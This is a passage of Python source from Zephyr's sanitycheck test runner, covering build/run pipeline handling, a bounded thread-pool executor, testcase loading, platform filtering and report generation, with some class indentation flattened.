                    logger.debug("filtering %s" % self.instance.name)
                    self.instance.status = "skipped"
                    self.instance.reason = "filter"
                    for case in self.instance.testcase.cases:
                        self.instance.results.update({case: 'SKIP'})
                    self.suite.total_skipped_cases += 1
                    pipeline.put({"op": "report", "test": self.instance})
                else:
                    pipeline.put({"op": "build", "test": self.instance})
        elif op == "build":
            logger.debug("build test: %s" % self.instance.name)
            results = self.build()
            if not results:
                self.instance.status = "error"
                self.instance.reason = "Build Failure"
                pipeline.put({"op": "report", "test": self.instance})
            else:
                if results.get('returncode', 1) > 0:
                    pipeline.put({"op": "report", "test": self.instance})
                else:
                    if self.instance.run:
                        pipeline.put({"op": "run", "test": self.instance})
                    else:
                        pipeline.put({"op": "report", "test": self.instance})
        # Run the generated binary using one of the supported handlers
        elif op == "run":
            logger.debug("run test: %s" % self.instance.name)
            self.run()
            self.instance.status, _ = self.instance.handler.get_state()
            logger.debug(f"run status: {self.instance.status}")
            pipeline.put({
                "op": "report",
                "test": self.instance,
                "state": "executed",
                "status": self.instance.status,
                "reason": self.instance.reason}
            )
        # Report results and output progress to screen
        elif op == "report":
            with report_lock:
                self.report_out()
            if self.cleanup and not self.coverage and self.instance.status == "passed":
                pipeline.put({
                    "op": "cleanup",
                    "test": self.instance
                })
        elif op == "cleanup":
            self.cleanup_artifacts()

    def cleanup_artifacts(self):
        """Delete everything in the build directory except whitelisted logs
        and config, then prune empty directories and directory symlinks."""
        logger.debug("Cleaning up {}".format(self.instance.build_dir))
        whitelist = [
            'zephyr/.config',
            'handler.log',
            'build.log',
            'device.log',
            'recording.csv',
        ]
        whitelist = [os.path.join(self.instance.build_dir, file) for file in whitelist]
        # Walk bottom-up so directories are empty by the time we reach them
        for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
            for name in filenames:
                path = os.path.join(dirpath, name)
                if path not in whitelist:
                    os.remove(path)
            # Remove empty directories and symbolic links to directories
            for dir in dirnames:
                path = os.path.join(dirpath, dir)
                if os.path.islink(path):
                    os.remove(path)
                elif not os.listdir(path):
                    os.rmdir(path)

    def report_out(self):
        """Update suite counters from this instance's status and print a
        per-test line (verbose) or the one-line progress bar."""
        total_tests_width = len(str(self.suite.total_to_do))
        self.suite.total_done += 1
        instance = self.instance
        if instance.status in ["error", "failed", "timeout"]:
            if instance.status == "error":
                self.suite.total_errors += 1
            self.suite.total_failed += 1
            if self.verbose:
                status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
            else:
                print("")
                logger.error(
                    "{:<25} {:<50} {}FAILED{}: {}".format(
                        instance.platform.name,
                        instance.testcase.name,
                        Fore.RED,
                        Fore.RESET,
                        instance.reason))
            if not self.verbose:
                self.log_info_file(self.inline_logs)
        elif instance.status == "skipped":
            self.suite.total_skipped += 1
            status = Fore.YELLOW + "SKIPPED" + Fore.RESET
        elif instance.status == "passed":
            self.suite.total_passed += 1
            status = Fore.GREEN + "PASSED" + Fore.RESET
        else:
            logger.debug(f"Unknown status = {instance.status}")
            status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
        if self.verbose:
            if self.cmake_only:
                more_info = "cmake"
            elif instance.status == "skipped":
                more_info = instance.reason
            else:
                if instance.handler and instance.run:
                    more_info = instance.handler.type_str
                    htime = instance.handler.duration
                    if htime:
                        more_info += " {:.3f}s".format(htime)
                else:
                    more_info = "build"
            logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
                self.suite.total_done, total_tests_width, self.suite.total_to_do, instance.platform.name,
                instance.testcase.name, status, more_info))
            if instance.status in ["error", "failed", "timeout"]:
                self.log_info_file(self.inline_logs)
        else:
            # Single-line progress indicator, rewritten in place with \r
            sys.stdout.write("\rINFO    - Total complete: %s%4d/%4d%s  %2d%%  skipped: %s%4d%s, failed: %s%4d%s" % (
                Fore.GREEN,
                self.suite.total_done,
                self.suite.total_to_do,
                Fore.RESET,
                int((float(self.suite.total_done) / self.suite.total_to_do) * 100),
                Fore.YELLOW if self.suite.total_skipped > 0 else Fore.RESET,
                self.suite.total_skipped,
                Fore.RESET,
                Fore.RED if self.suite.total_failed > 0 else Fore.RESET,
                self.suite.total_failed,
                Fore.RESET
            )
            )
            sys.stdout.flush()

    def cmake(self):
        """Assemble the cmake argument list (extra args, handler args and
        merged OVERLAY_CONFIG fragments) and run the configure step."""
        instance = self.instance
        args = self.testcase.extra_args[:]
        args += self.extra_args
        if instance.handler:
            args += instance.handler.args
        # merge overlay files into one variable
        def extract_overlays(args):
            re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
            other_args = []
            overlays = []
            for arg in args:
                match = re_overlay.search(arg)
                if match:
                    overlays.append(match.group(1).strip('\'"'))
                else:
                    other_args.append(arg)
            args[:] = other_args
            return overlays
        overlays = extract_overlays(args)
        if (self.testcase.extra_configs or self.coverage or
                self.asan or self.ubsan):
            overlays.append(os.path.join(instance.build_dir,
                                         "sanitycheck", "testcase_extra.conf"))
        if overlays:
            args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
        results = self.run_cmake(args)
        return results

    def build(self):
        """Run the actual build step in the configured build directory."""
        results = self.run_build(['--build', self.build_dir])
        return results

    def run(self):
        """Execute the built test via the instance's handler."""
        instance = self.instance
        if instance.handler.type_str == "device":
            instance.handler.suite = self.suite
        instance.handler.handle()
        sys.stdout.flush()
class BoundedExecutor(concurrent.futures.ThreadPoolExecutor):
    """BoundedExecutor behaves as a ThreadPoolExecutor which will block on
    calls to submit() once the limit given as "bound" work items are queued for
    execution.
    :param bound: Integer - the maximum number of items in the work queue
    :param max_workers: Integer - the size of the thread pool
    """

    def __init__(self, bound, max_workers, **kwargs):
        # Bug fix: forward extra keyword arguments (e.g. thread_name_prefix,
        # initializer) to ThreadPoolExecutor instead of silently dropping them.
        super().__init__(max_workers, **kwargs)
        # Allow "bound" items to queue on top of the workers currently busy.
        self.semaphore = BoundedSemaphore(bound + max_workers)

    def submit(self, fn, *args, **kwargs):
        """Submit fn, blocking while bound + max_workers items are in flight.

        The semaphore slot is released when the future completes; if the
        submission itself raises, the slot is released immediately so it
        is not leaked.
        """
        self.semaphore.acquire()
        try:
            future = super().submit(fn, *args, **kwargs)
        except Exception:
            self.semaphore.release()
            raise
        else:
            future.add_done_callback(lambda x: self.semaphore.release())
        return future
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "testcase-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_whitelist": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_whitelist": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_whitelist": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk",
"sanity_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.platforms = []
self.selected_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_tests = 0 # number of test instances
self.total_cases = 0 # number of test cases
self.total_skipped_cases = 0 # number of skipped test cases
self.total_done = 0 # tests completed
self.total_failed = 0
self.total_skipped = 0
self.total_passed = 0
self.total_errors = 0
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
self.cv = threading.Condition()
# hardcoded for now
self.connected_hardware = []
# run integration tests only
self.integration = False
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + "/")}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update(self):
self.total_tests = len(self.instances)
self.total_to_do = self.total_tests - self.total_skipped
self.total_cases = 0
for instance in self.instances:
self.total_cases += len(self.instances[instance].testcase.cases)
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.info("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def misc_reports(self, report, show_footprint, all_deltas,
                 footprint_threshold, last_metrics):
    """Log RAM/ROM footprint deltas against a saved metrics CSV.

    :param report: path to the baseline CSV (no-op if falsy).
    :param show_footprint: when True, log a line per changed metric.
    :param all_deltas: when True, report improvements too and tag lines
        as INFO instead of WARNING.
    :param footprint_threshold: minimum percentage change to report
        (ignored when all_deltas is set).
    :param last_metrics: True if the baseline came from the last run
        rather than the last release (only affects the summary line).
    """
    if not report:
        return

    deltas = self.compare_metrics(report)
    warnings = 0
    if deltas and show_footprint:
        for i, metric, value, delta, lower_better in deltas:
            # Unless all deltas were requested, skip improvements.
            if not all_deltas and ((delta < 0 and lower_better) or
                                   (delta > 0 and not lower_better)):
                continue

            # Relative change against the baseline value (value - delta).
            percentage = (float(delta) / float(value - delta))
            if not all_deltas and (percentage <
                                   (footprint_threshold / 100.0)):
                continue

            logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
                i.platform.name, i.testcase.name, Fore.YELLOW,
                "INFO" if all_deltas else "WARNING", Fore.RESET,
                metric, delta, value, percentage))
            warnings += 1

    if warnings:
        logger.warning("Deltas based on metrics from last %s" %
                       ("release" if not last_metrics else "run"))
def summary(self, unrecognized_sections):
    """Log the final colorized pass/fail summary for the whole run.

    :param unrecognized_sections: when True, unrecognized binary
        sections are tolerated; otherwise each instance reporting them
        is counted (and logged) as a failure.
    """
    failed = 0
    run = 0
    for instance in self.instances.values():
        if instance.status == "failed":
            failed += 1
        elif instance.metrics.get("unrecognized") and not unrecognized_sections:
            logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
                         (Fore.RED, Fore.RESET, instance.name,
                          str(instance.metrics.get("unrecognized", []))))
            failed += 1

        # A non-zero handler time means the test actually executed
        # (not just built).  NOTE(review): this raises KeyError if
        # "handler_time" was never set — presumably execute() always
        # runs first; confirm.
        if instance.metrics['handler_time']:
            run += 1

    # Guard against division by zero when nothing (or everything
    # skipped) was selected.
    if self.total_tests and self.total_tests != self.total_skipped:
        pass_rate = (float(self.total_passed) / float(
            self.total_tests - self.total_skipped))
    else:
        pass_rate = 0

    logger.info(
        "{}{} of {}{} tests passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
            Fore.RED if failed else Fore.GREEN,
            self.total_passed,
            self.total_tests - self.total_skipped,
            Fore.RESET,
            pass_rate,
            Fore.RED if self.total_failed else Fore.RESET,
            self.total_failed,
            Fore.RESET,
            self.total_skipped,
            Fore.YELLOW if self.warnings else Fore.RESET,
            self.warnings,
            Fore.RESET,
            self.duration))

    self.total_platforms = len(self.platforms)
    if self.platforms:
        logger.info("In total {} test cases were executed on {} out of total {} platforms ({:02.2f}%)".format(
            self.total_cases - self.total_skipped_cases,
            len(self.selected_platforms),
            self.total_platforms,
            (100 * len(self.selected_platforms) / len(self.platforms))
        ))

    logger.info(f"{Fore.GREEN}{run}{Fore.RESET} tests executed on platforms, \
{Fore.RED}{self.total_tests - run - self.total_skipped}{Fore.RESET} tests were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed):
    """Write every configured report file for this run.

    Produces the xunit reports (summary and full), the CSV report, the
    per-platform target reports, the discard report (if anything was
    discarded) and, for releases, the release metrics CSV.

    :param name: base report name; defaults to "sanitycheck".
    :param suffix: optional suffix appended to the base name.
    :param report_dir: directory for reports (created if needed);
        defaults to the suite output directory.
    :param no_update: when True, nothing is written.
    :param release: also write the release metrics CSV.
    :param only_failed: append to existing xunit files instead of
        overwriting them.
    """
    if not self.instances:
        return

    report_name = name or "sanitycheck"

    if report_dir:
        os.makedirs(report_dir, exist_ok=True)
        outdir = report_dir
    else:
        outdir = self.outdir
    filename = os.path.join(outdir, report_name)

    if suffix:
        filename = "{}_{}".format(filename, suffix)

    if no_update:
        return

    self.xunit_report(filename + ".xml", full_report=False, append=only_failed)
    self.xunit_report(filename + "_report.xml", full_report=True, append=only_failed)
    self.csv_report(filename + ".csv")
    self.target_report(outdir, suffix, append=only_failed)
    if self.discards:
        self.discard_report(filename + "_discard.csv")

    if release:
        self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
    """Discover platform configurations under every board root.

    Scans <board_root>/*/*/*.yaml, loads each file as a Platform, and
    records it in self.platforms (and self.default_platforms for
    platforms marked as default).  Load failures are logged and
    counted in self.load_errors rather than raised.
    """
    for board_root in self.board_roots:
        board_root = os.path.abspath(board_root)
        logger.debug("Reading platform configuration files under %s..." %
                     board_root)
        for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
            logger.debug("Found platform configuration " + file)
            try:
                platform = Platform()
                platform.load(file)
                # Only platforms opted into sanitycheck are usable.
                if platform.sanitycheck:
                    self.platforms.append(platform)
                    if platform.default:
                        self.default_platforms.append(platform.name)
            except RuntimeError as e:
                logger.error("E: %s: can't load: %s" % (file, e))
                self.load_errors += 1
def get_all_tests(self):
    """Return a flat list of every individual case across all testcases."""
    return [case
            for tc in self.testcases.values()
            for case in tc.cases]
@staticmethod
def get_toolchain():
toolchain = os.environ.get("ZEPHYR_TOOLCHAIN_VARIANT", None) or \
os.environ.get("ZEPHYR_GCC_VARIANT", None)
if toolchain == "gccarmemb":
# Remove this translation when gccarmemb is no longer supported.
toolchain = "gnuarmemb"
try:
if not toolchain:
raise SanityRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
return toolchain
def add_testcases(self, testcase_filter=[]):
    """Walk every testcase root and load all testcase definitions.

    For each directory containing a sample or testcase YAML file, the
    file is parsed and one TestCase object per defined test is stored
    in self.testcases.  Parse failures are logged and counted in
    self.load_errors rather than raised.

    :param testcase_filter: optional list of testcase names; when
        non-empty, only matching testcases are kept.
        NOTE(review): mutable default argument — harmless here since
        it is never mutated, but a None sentinel would be safer.
    """
    for root in self.roots:
        root = os.path.abspath(root)

        logger.debug("Reading test case configuration files under %s..." % root)

        for dirpath, dirnames, filenames in os.walk(root, topdown=True):
            logger.debug("scanning %s" % dirpath)
            # Samples take precedence over regular testcase files.
            if self.SAMPLE_FILENAME in filenames:
                filename = self.SAMPLE_FILENAME
            elif self.TESTCASE_FILENAME in filenames:
                filename = self.TESTCASE_FILENAME
            else:
                continue

            logger.debug("Found possible test case in " + dirpath)

            # Stop descending once a testcase directory is found.
            dirnames[:] = []

            tc_path = os.path.join(dirpath, filename)

            try:
                parsed_data = SanityConfigParser(tc_path, self.tc_schema)
                parsed_data.load()

                tc_path = os.path.dirname(tc_path)
                workdir = os.path.relpath(tc_path, root)

                # One YAML file may define several named tests.
                for name in parsed_data.tests.keys():
                    tc = TestCase(root, workdir, name)

                    tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)

                    tc.source_dir = tc_path
                    tc.yamlfile = tc_path

                    tc.type = tc_dict["type"]
                    tc.tags = tc_dict["tags"]
                    tc.extra_args = tc_dict["extra_args"]
                    tc.extra_configs = tc_dict["extra_configs"]
                    tc.arch_whitelist = tc_dict["arch_whitelist"]
                    tc.arch_exclude = tc_dict["arch_exclude"]
                    tc.skip = tc_dict["skip"]
                    tc.platform_exclude = tc_dict["platform_exclude"]
                    tc.platform_whitelist = tc_dict["platform_whitelist"]
                    tc.toolchain_exclude = tc_dict["toolchain_exclude"]
                    tc.toolchain_whitelist = tc_dict["toolchain_whitelist"]
                    tc.tc_filter = tc_dict["filter"]
                    tc.timeout = tc_dict["timeout"]
                    tc.harness = tc_dict["harness"]
                    tc.harness_config = tc_dict["harness_config"]
                    # The console harness is unusable without a config.
                    if tc.harness == 'console' and not tc.harness_config:
                        raise Exception('Harness config error: console harness defined without a configuration.')
                    tc.build_only = tc_dict["build_only"]
                    tc.build_on_all = tc_dict["build_on_all"]
                    tc.slow = tc_dict["slow"]
                    tc.min_ram = tc_dict["min_ram"]
                    tc.depends_on = tc_dict["depends_on"]
                    tc.min_flash = tc_dict["min_flash"]
                    tc.extra_sections = tc_dict["extra_sections"]
                    tc.integration_platforms = tc_dict["integration_platforms"]

                    tc.parse_subcases(tc_path)

                    if testcase_filter:
                        if tc.name and tc.name in testcase_filter:
                            self.testcases[tc.name] = tc
                    else:
                        self.testcases[tc.name] = tc

            except Exception as e:
                logger.error("%s: can't load (skipping): %s" % (tc_path, e))
                self.load_errors += 1
def get_platform(self, name):
    """Return the platform object named *name*, or None if unknown."""
    return next((p for p in self.platforms if p.name == name), None)
def load_from_file(self, file, filter_status=[]):
    """Rebuild the instance set from a previously written CSV report.

    Each row (test, platform, status, ...) becomes a TestInstance,
    unless its status is listed in *filter_status*.  Exits with
    status 2 on a malformed or missing file.

    NOTE(review): mutable default argument for filter_status — never
    mutated here, but a None sentinel would be safer.
    """
    try:
        with open(file, "r") as fp:
            cr = csv.DictReader(fp)
            instance_list = []
            for row in cr:
                # Skip rows whose recorded status the caller excluded.
                if row["status"] in filter_status:
                    continue
                test = row["test"]

                platform = self.get_platform(row["platform"])
                instance = TestInstance(self.testcases[test], platform, self.outdir)
                instance.check_build_or_run(
                    self.build_only,
                    self.enable_slow,
                    self.device_testing,
                    self.fixtures
                )
                instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
                instance_list.append(instance)
            self.add_instances(instance_list)

    except KeyError as e:
        logger.error("Key error while parsing tests file.({})".format(str(e)))
        sys.exit(2)

    except FileNotFoundError as e:
        logger.error("Couldn't find input file with list of tests. ({})".format(e))
        sys.exit(2)
def apply_filters(self, **kwargs):
    """Build the instance set, filtering testcase/platform combinations.

    Creates a TestInstance for every (testcase, platform) pair, then
    records a discard reason for every pair excluded by command-line
    filters, testcase metadata (whitelists/excludes), or platform
    capabilities (RAM/flash/toolchain/hardware deps).  Surviving
    instances are registered via add_instances(); discarded ones are
    marked "skipped".

    :return: dict mapping discarded instances to their (first) reason.
    """
    toolchain = self.get_toolchain()

    discards = {}
    platform_filter = kwargs.get('platform')
    exclude_platform = kwargs.get('exclude_platform', [])
    testcase_filter = kwargs.get('run_individual_tests', [])
    arch_filter = kwargs.get('arch')
    tag_filter = kwargs.get('tag')
    exclude_tag = kwargs.get('exclude_tag')
    all_filter = kwargs.get('all')
    device_testing_filter = kwargs.get('device_testing')
    force_toolchain = kwargs.get('force_toolchain')
    force_platform = kwargs.get('force_platform')

    logger.debug("platform filter: " + str(platform_filter))
    logger.debug("    arch_filter: " + str(arch_filter))
    logger.debug("     tag_filter: " + str(tag_filter))
    logger.debug("    exclude_tag: " + str(exclude_tag))

    default_platforms = False

    if platform_filter:
        platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
    else:
        platforms = self.platforms

    if all_filter:
        logger.info("Selecting all possible platforms per test case")
        # When --all used, any --platform arguments ignored
        platform_filter = []
    elif not platform_filter:
        logger.info("Selecting default platforms per test case")
        default_platforms = True

    logger.info("Building initial testcase list...")

    for tc_name, tc in self.testcases.items():
        # list of instances per testcase, aka configurations.
        instance_list = []
        for plat in platforms:
            instance = TestInstance(tc, plat, self.outdir)
            instance.check_build_or_run(
                self.build_only,
                self.enable_slow,
                self.device_testing,
                self.fixtures
            )
            for t in tc.cases:
                instance.results[t] = None

            # Connected hardware providing the required fixture makes
            # the instance runnable even in device-testing mode.
            if device_testing_filter:
                for h in self.connected_hardware:
                    if h['platform'] == plat.name:
                        if tc.harness_config.get('fixture') in h.get('fixtures', []):
                            instance.build_only = False
                            instance.run = True

            # Each check below records only the FIRST matching reason
            # (discards.get keeps an existing entry).
            if not force_platform and plat.name in exclude_platform:
                discards[instance] = discards.get(instance, "Platform is excluded on command line.")

            if (plat.arch == "unit") != (tc.type == "unit"):
                # Discard silently
                continue

            if device_testing_filter and instance.build_only:
                discards[instance] = discards.get(instance, "Not runnable on device")

            if self.integration and tc.integration_platforms and plat.name not in tc.integration_platforms:
                discards[instance] = discards.get(instance, "Not part of integration platforms")

            if tc.skip:
                discards[instance] = discards.get(instance, "Skip filter")

            # build_on_all overrides any platform restriction.
            if tc.build_on_all and not platform_filter:
                platform_filter = []

            if tag_filter and not tc.tags.intersection(tag_filter):
                discards[instance] = discards.get(instance, "Command line testcase tag filter")

            if exclude_tag and tc.tags.intersection(exclude_tag):
                discards[instance] = discards.get(instance, "Command line testcase exclude filter")

            if testcase_filter and tc_name not in testcase_filter:
                discards[instance] = discards.get(instance, "Testcase name filter")

            if arch_filter and plat.arch not in arch_filter:
                discards[instance] = discards.get(instance, "Command line testcase arch filter")

            # Testcase-level metadata filters are bypassed by --force-platform.
            if not force_platform:

                if tc.arch_whitelist and plat.arch not in tc.arch_whitelist:
                    discards[instance] = discards.get(instance, "Not in test case arch whitelist")

                if tc.arch_exclude and plat.arch in tc.arch_exclude:
                    discards[instance] = discards.get(instance, "In test case arch exclude")

                if tc.platform_exclude and plat.name in tc.platform_exclude:
                    discards[instance] = discards.get(instance, "In test case platform exclude")

            if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
                discards[instance] = discards.get(instance, "In test case toolchain exclude")

            if platform_filter and plat.name not in platform_filter:
                discards[instance] = discards.get(instance, "Command line platform filter")

            if tc.platform_whitelist and plat.name not in tc.platform_whitelist:
                discards[instance] = discards.get(instance, "Not in testcase platform whitelist")

            if tc.toolchain_whitelist and toolchain not in tc.toolchain_whitelist:
                discards[instance] = discards.get(instance, "Not in testcase toolchain whitelist")

            if not plat.env_satisfied:
                discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))

            if not force_toolchain \
                    and toolchain and (toolchain not in plat.supported_toolchains) \
                    and tc.type != 'unit':
                discards[instance] = discards.get(instance, "Not supported by the toolchain")

            if plat.ram < tc.min_ram:
                discards[instance] = discards.get(instance, "Not enough RAM")

            if tc.depends_on:
                dep_intersection = tc.depends_on.intersection(set(plat.supported))
                if dep_intersection != set(tc.depends_on):
                    discards[instance] = discards.get(instance, "No hardware support")

            if plat.flash < tc.min_flash:
                discards[instance] = discards.get(instance, "Not enough FLASH")

            if set(plat.ignore_tags) & tc.tags:
                discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")

            if plat.only_tags and not set(plat.only_tags) & tc.tags:
                discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")

            # if nothing stopped us until now, it means this configuration
            # needs to be added.
            instance_list.append(instance)

        # no configurations, so jump to next testcase
        if not instance_list:
            continue

        # if sanitycheck was launched with no platform options at all, we
        # take all default platforms
        if default_platforms and not tc.build_on_all:
            if tc.platform_whitelist:
                a = set(self.default_platforms)
                b = set(tc.platform_whitelist)
                c = a.intersection(b)
                if c:
                    # NOTE(review): the lambda parameter shadows the
                    # enclosing loop variable `tc`.
                    aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
                    self.add_instances(aa)
                else:
                    self.add_instances(instance_list[:1])
            else:
                instances = list(filter(lambda tc: tc.platform.default, instance_list))
                self.add_instances(instances)

                for instance in list(filter(lambda inst: not inst.platform.default, instance_list)):
                    discards[instance] = discards.get(instance, "Not a default test platform")

        else:
            self.add_instances(instance_list)

    for _, case in self.instances.items():
        case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)

    self.discards = discards
    self.selected_platforms = set(p.platform.name for p in self.instances.values())

    for instance in self.discards:
        instance.reason = self.discards[instance]
        instance.status = "skipped"
        instance.fill_results_by_status()
        # We only count skipped tests for instances in self.instances
        if self.instances.get(instance.name, False):
            self.total_skipped += 1
            self.total_skipped_cases += len(instance.testcase.cases)

    return discards
def add_instances(self, instance_list):
    """Register each instance in the suite, keyed by its unique name."""
    self.instances.update((inst.name, inst) for inst in instance_list)
def add_tasks_to_queue(self, test_only=False):
    """Feed the global build/run pipeline with one work item per instance.

    In *test_only* mode, only runnable instances are queued (to be run
    against already-built binaries); otherwise every instance without a
    final status is reset and queued for a fresh cmake pass.

    :return: the sentinel string "DONE FEEDING" (consumed by execute()).
    """
    for instance in self.instances.values():
        if test_only:
            if instance.run:
                pipeline.put({"op": "run", "test": instance, "status": "built"})
            continue
        if instance.status not in ['passed', 'skipped', 'error']:
            instance.status = None
        pipeline.put({"op": "cmake", "test": instance})

    return "DONE FEEDING"
def execute(self):
    """Run the whole pipeline: feed tasks, build/run them, collect sizes.

    A feeder future enqueues work items onto the global `pipeline`
    queue; each item is handed to a ProjectBuilder future running in a
    BoundedExecutor.  After everything completes, per-instance size
    metrics are computed (in parallel) unless only cmake was run.
    """
    def calc_one_elf_size(instance):
        # Fill ram/rom/unrecognized metrics for one built instance.
        if instance.status not in ["error", "failed", "skipped"]:
            if instance.platform.type != "native":
                size_calc = instance.calculate_sizes()
                instance.metrics["ram_size"] = size_calc.get_ram_size()
                instance.metrics["rom_size"] = size_calc.get_rom_size()
                instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
            else:
                # Native builds have no meaningful footprint.
                instance.metrics["ram_size"] = 0
                instance.metrics["rom_size"] = 0
                instance.metrics["unrecognized"] = []

            instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0

    logger.info("Adding tasks to the queue...")

    # We can use a with statement to ensure threads are cleaned up promptly
    with BoundedExecutor(bound=self.jobs, max_workers=self.jobs) as executor:

        # start a future for a thread which sends work in through the queue
        future_to_test = {
            executor.submit(self.add_tasks_to_queue, self.test_only): 'FEEDER DONE'}

        while future_to_test:
            # check for status of the futures which are currently working
            done, pending = concurrent.futures.wait(future_to_test, timeout=1,
                                                    return_when=concurrent.futures.FIRST_COMPLETED)

            # if there is incoming work, start a new future
            while not pipeline.empty():
                # fetch a url from the queue
                message = pipeline.get()
                test = message['test']

                pb = ProjectBuilder(self,
                                    test,
                                    lsan=self.enable_lsan,
                                    asan=self.enable_asan,
                                    ubsan=self.enable_ubsan,
                                    coverage=self.enable_coverage,
                                    extra_args=self.extra_args,
                                    device_testing=self.device_testing,
                                    cmake_only=self.cmake_only,
                                    cleanup=self.cleanup,
                                    valgrind=self.enable_valgrind,
                                    inline_logs=self.inline_logs,
                                    generator=self.generator,
                                    generator_cmd=self.generator_cmd,
                                    verbose=self.verbose,
                                    warnings_as_errors=self.warnings_as_errors
                                    )

                future_to_test[executor.submit(pb.process, message)] = test.name

            # process any completed futures
            for future in done:
                test = future_to_test[future]
                try:
                    data = future.result()
                except Exception as exc:
                    # A builder crash aborts the whole run.
                    logger.error('%r generated an exception:' % (test,))
                    for line in traceback.format_exc().splitlines():
                        logger.error(line)
                    sys.exit('%r generated an exception: %s' % (test, exc))
                else:
                    if data:
                        logger.debug(data)

                # remove the now completed future
                del future_to_test[future]

            for future in pending:
                test = future_to_test[future]
                try:
                    future.result(timeout=180)
                except concurrent.futures.TimeoutError:
                    logger.warning("{} stuck?".format(test))

    if self.enable_size_report and not self.cmake_only:
        # Parallelize size calculation
        executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
        futures = [executor.submit(calc_one_elf_size, instance)
                   for instance in self.instances.values()]
        concurrent.futures.wait(futures)
    else:
        for instance in self.instances.values():
            instance.metrics["ram_size"] = 0
            instance.metrics["rom_size"] = 0
            instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
            instance.metrics["unrecognized"] = []
def discard_report(self, filename):
try:
if not self.discards:
raise SanityRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
